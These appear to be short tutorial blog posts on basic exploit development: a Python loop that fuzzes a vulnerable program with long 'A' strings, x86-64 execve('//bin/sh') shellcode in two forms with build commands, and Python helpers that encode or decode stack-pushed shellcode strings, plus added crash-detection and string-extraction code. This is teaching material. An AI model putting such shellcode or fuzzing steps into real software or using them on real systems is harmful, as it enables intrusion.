Wednesday, March 11, 2020

simplistic python fuzzing

import os

# send runs of 'A' of increasing length (500, 501, ... 999) to ./vulnapp over a pipe
for i in range(500, 1000, 1):
    cmd = ("python -c \"print('A' * %d)\"" % i)
    print("fuzzing length %d" % i)
    os.system("%s | ./vulnapp" % cmd)

 this passes AAAAA... where the length is 500, 501, 502, ... all the way to 1000
 and just looks to see at which input length the program seg faults
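The os.system loop above only shows the lengths it tried; it never tells you how the target died. The harness below is an added example (not the post's own code) that does the same length sweep with subprocess so the exit status is visible, and reports the first length that kills the target with a signal. It assumes a constructed stand-in for ./vulnapp (FAKE_VULNAPP, a small Python one-liner that raises SIGSEGV on itself once the line is longer than 700 bytes) so it can run without a vulnerable binary; for a real run you would pass the real program's argv list instead.

```python
import signal
import subprocess
import sys


def run_once(target, payload, timeout=5):
    """Run `target` (an argv list) with `payload` on stdin.
    Returns (returncode, signal_name): signal_name is e.g. "SIGSEGV" when the
    process was killed by a signal, otherwise None."""
    proc = subprocess.run(target, input=payload,
                          stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL,
                          timeout=timeout)
    if proc.returncode < 0:  # subprocess reports "killed by signal N" as -N
        return proc.returncode, signal.Signals(-proc.returncode).name
    return proc.returncode, None


def find_crash_length(target, start=500, stop=1000, step=1, fill=b"A"):
    """Feed growing runs of `fill` to the target, like the os.system loop above,
    and stop at the first length that kills it with a signal.
    Returns (length, signal_name), or None if no length in the range crashed."""
    for n in range(start, stop, step):
        _, sig = run_once(target, fill * n + b"\n")
        if sig is not None:
            return n, sig
    return None


# Constructed stand-in for ./vulnapp (hypothetical, not a real target): reads stdin
# and raises SIGSEGV on itself once the line is longer than 700 bytes, so the
# harness can be exercised without a vulnerable binary.
FAKE_VULNAPP = [
    sys.executable, "-c",
    "import os, signal, sys\n"
    "data = sys.stdin.buffer.read().rstrip(b'\\n')\n"
    "if len(data) > 700:\n"
    "    os.kill(os.getpid(), signal.SIGSEGV)\n",
]

if __name__ == "__main__":
    # (701, 'SIGSEGV') for the stand-in: 701 A's is the first line over 700 bytes
    print("first crash:", find_crash_length(FAKE_VULNAPP, 690, 720))
```

Checking the sign of the return code is what distinguishes "the program exited normally on this input" from "this input killed it", which is the only thing this kind of length sweep is looking for.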

Tuesday, March 10, 2020

shellcode in ASM to C program examples

not optimized for shortness
does not remove null (00) characters

using push
section .text
 global _start

_start:
 xor rdi, rdi ; null char to terminate the string
 push rdi
 mov rdi, 0x68732f6e69622f2f ; "//bin/sh" as a little-endian immediate
 push rdi
 mov rdi, rsp ; filename: rsp now points at "//bin/sh\0"
 mov rsi, 0 ; argv
 mov rdx, 0 ; envp
 mov rax, 59 ; execve syscall number
 syscall

using data
section .data
 sh: db "//bin/sh", 0 ; null-terminated filename

section .text
 global _start

_start:
 mov rdi, sh ; filename
 mov rsi, 0 ; argv
 mov rdx, 0 ; envp
 mov rax, 59 ; execve syscall number
 syscall

to compile
$> nasm -f elf64 mycode.asm -o mycode.o
$> ld mycode.o -o mycode
$> ./mycode
# whoami

Convert String to Shell Code Hex in Python

if you want to turn a string into hex you can use in assembly for shellcode

>>> import re, binascii
>>> for word in re.findall(".{8}", binascii.hexlify("//bin/sh".encode()).decode()):
...     byte = re.findall(".{2}", word)
...     cmd = ""
...     for index in range(len(byte)-1, -1, -1):
...         cmd = cmd + byte[index]
...     print("push 0x%s" % cmd)
...
push 0x69622f2f
push 0x68732f6e

side notes
   binascii.hexlify converts the string's bytes to a hex string
   re.findall(".{8}", ...) finds the words (4 bytes = 8 hex characters each)
   re.findall(".{2}", ...) finds the bytes
   range(..., ..., -1) loops through the bytes in each word backwards (endianness)
   cmd = cmd + ... rebuilds the hex in the correct (little-endian) order

Decode ShellCode String in Python

if you see this

push 0x68732f2f
push 0x6e69622f

it may be a string
you can use python 3 to decode and see

>>> import binascii
>>> binascii.unhexlify("68732f2f").decode()[::-1]
'//sh'
>>> binascii.unhexlify("6e69622f").decode()[::-1]
'/bin'

yep! shellcode


side note:
  binascii.unhexlify was used to convert the hex back to bytes

  decode() was used to convert the bytes to a string

  [::-1] was used to reverse the string's characters (undoing the little-endian byte order)
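Doing the unhexlify-and-reverse step by hand for every immediate gets old when reading a disassembly, so here is an added example (not the post's own code) that scans assembly text for hex immediates, decodes each one the way the lines above do, and keeps only the ones that decode to printable text. It also joins a sequence of push lines in memory order, since the last push lands at the lowest address and is read first. The sample assembly is constructed from the snippets on this page, and the function names are my own.

```python
import re
import string

_IMM = re.compile(r"0x([0-9a-fA-F]+)")
_PRINTABLE = set(string.printable) - set("\x0b\x0c")


def immediate_to_string(hexdigits):
    """Decode one immediate as the interactive lines above do (unhexlify then
    [::-1]): the immediate's little-endian bytes are the bytes it lays out in
    memory. Trailing 00 bytes are dropped so a padded word decodes cleanly."""
    if len(hexdigits) % 2:
        hexdigits = "0" + hexdigits
    raw = int(hexdigits, 16).to_bytes(len(hexdigits) // 2, "little")
    return raw.rstrip(b"\x00").decode("latin-1")


def looks_printable(text):
    """True when the decoded text is non-empty and entirely printable ASCII."""
    return text != "" and all(c in _PRINTABLE for c in text)


def extract_strings(asm_text):
    """Scan assembly (or disassembly) lines for hex immediates that decode to
    printable text. Returns [(stripped_line, decoded_text), ...]."""
    found = []
    for line in asm_text.splitlines():
        m = _IMM.search(line)
        if not m:
            continue
        decoded = immediate_to_string(m.group(1))
        if looks_printable(decoded):
            found.append((line.strip(), decoded))
    return found


def stack_string(push_lines):
    """Join the strings from a sequence of push lines in memory order: the last
    push ends up at the lowest address, so the pieces are read back to front."""
    pieces = [immediate_to_string(_IMM.search(line).group(1)) for line in push_lines]
    return "".join(reversed(pieces))


# Constructed sample: the two snippets from this page plus some non-string lines
SAMPLE_ASM = """\
    xor rdi, rdi
    push rdi
    mov rdi, 0x68732f6e69622f2f
    push rdi
    mov rdi, rsp
    mov rsi, 0
    mov rax, 59
    push 0x68732f2f
    push 0x6e69622f
    mov eax, 0x1
"""

if __name__ == "__main__":
    for line, text in extract_strings(SAMPLE_ASM):
        print("%-32s -> %r" % (line, text))
    # the two pushes above, read in memory order
    print(stack_string(["push 0x68732f2f", "push 0x6e69622f"]))
```

Decimal operands such as the 59 in "mov rax, 59" are left alone on purpose: only 0x-prefixed immediates are candidates, and anything that decodes to control characters (like 0x1) is dropped, which keeps the output to the strings a human would want to see.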